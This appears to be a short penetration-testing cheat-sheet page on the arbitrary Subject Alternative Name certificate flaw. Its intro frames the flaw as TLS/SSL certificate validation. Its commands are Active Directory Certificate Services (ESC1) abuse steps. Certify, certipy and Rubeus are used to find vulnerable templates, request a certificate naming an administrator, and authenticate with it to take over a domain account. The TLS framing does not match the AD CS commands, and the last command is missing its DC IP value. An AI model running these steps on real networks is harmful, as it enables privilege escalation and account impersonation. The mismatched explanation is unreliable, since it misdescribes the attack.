The Arbitrary Subject Alternative Name (SAN) Vulnerability refers to a security flaw in certificate validation mechanisms of TLS/SSL protocols.
This vulnerability allows attackers to issue certificates that include unauthorized domain names in the SAN field, potentially enabling phishing attacks or man-in-the-middle (MITM) attacks.
It stems from inadequate verification of the entities that request certificates and the domains listed in the SAN field.
To mitigate this vulnerability, it's essential to:
- Implement strict validation processes for certificate requests, ensuring that the entity requesting the certificate has legitimate control over the domains listed in the SAN field.
- Use Certificate Transparency logs to monitor and identify potentially malicious certificates.
- Employ modern TLS libraries and configurations that adhere to best practices in certificate validation.
To find vulnerable certificate templates you can run:
{% tabs %} {% tab title="Windows" %}
Certify.exe find /vulnerable
{% endtab %}
{% tab title="Linux" %}
certipy find -u john@corp.local -p Passw0rd -dc-ip 172.16.126.128
{% endtab %} {% endtabs %}
To abuse this vulnerability to impersonate an administrator one could run:
{% tabs %} {% tab title="Windows" %}
Certify.exe request /ca:dc.theshire.local-DC-CA /template:VulnTemplate /altname:localadmin
{% endtab %}
{% tab title="Linux" %}
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local'
{% endtab %} {% endtabs %}
Then you can transform the generated certificate to .pfx format and use it to authenticate using Rubeus or certipy again:
{% tabs %} {% tab title="Windows" %}
Rubeus.exe asktgt /user:localdomain /certificate:localadmin.pfx /password:password123! /ptt
{% endtab %}
{% tab title="Linux" %}
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip
{% endtab %} {% endtabs %}